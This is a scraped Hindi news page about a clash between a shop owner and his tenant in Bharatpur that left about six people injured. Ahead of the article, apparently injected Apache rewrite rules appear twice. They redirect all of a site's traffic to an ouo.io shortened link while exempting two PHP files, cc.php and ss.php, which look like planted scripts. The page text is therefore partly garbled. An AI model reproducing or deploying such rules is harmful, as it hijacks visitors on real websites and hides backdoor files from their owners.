
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 702
Nextभरतपुर। मथुरा गेट थाना क्षेत्र में एक दुकान को लेकर दो पक्षों में हुए घमासान में आधा दर्जन से अधिक लोग घायल हो गए। उन्हें जिला आरबीएम अस्पताल में भर्ती कराया गया।
जानकारी के अनुसार बिजलीघर चौराहे के पास रसाला मोहल्ला निवासी लाखन सिंह की एक दुकान है, जिसे मजीद ने किराये पर ले रखा था। बताया जा रहा है कि दुकान मालिक काफी समय से दुकान खाली कराने का प्रयास कर रहा था। वहीं मजीद उन्हें वहीं दुकान चलाने देने की बात कह रहा था। मजीद के परिवार में शनिवार को शादी थी। मजीद शादी में गया था। इसी दौरान लाखन सिंह के घर में निर्माण कार्य शुरू हो गया। जब मजीद रविवार को भरतपुर लौटा तो उसे दुकान पर निर्माण चलता दिखा। इस पर उसे अंदेशा हुआ कि उसका मकान मालिक पीछे से उसकी दुकान खाली करा रहा है। इस पर दोनों पक्षों में झगड़ा हो गया। दोनों पक्षों में जमकर लाठी-भाटा जंग हो गई। इसमें दोनों पक्षों के करीब आधा दर्जन लोग घायल हो गए।